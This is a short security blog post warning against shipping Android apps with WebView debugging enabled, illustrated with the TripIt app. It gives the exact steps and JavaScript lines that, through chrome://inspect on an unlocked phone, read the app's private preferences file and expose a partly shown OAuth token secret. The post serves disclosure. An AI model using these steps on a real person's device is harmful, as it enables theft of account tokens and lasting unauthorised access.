WebView debugging can be enabled via WebView.setWebContentsDebuggingEnabled(true). Leaving WebView debugging enabled in production Android apps is a bad idea. Anyone who gets hold of the unlocked phone can access the app’s data forever.

Consider this, the Tripit app exposes WebView debugging and by using that I can read all the files inside the private data directory. As an example, by connecting a user’s unlocked mobile phone to my laptop, I can extract TripIt OAuthToken.

First connect the phone via ADB, open chrome://inspect in the Chrome browser, then enter the following in there.

window.location="file:///data/data/com.tripit/shared_prefs/com.tripit.xml"
document.getElementsByTagName("html")[0].innerHTML

Now, you can see all the entries like

<string name=”oauthTokenSecret”>f731d36cdbf9006f917307…</string>

These auth tokens can be copied and used to get permanent access to the user’s TripIt account.

Original post at ashishb.net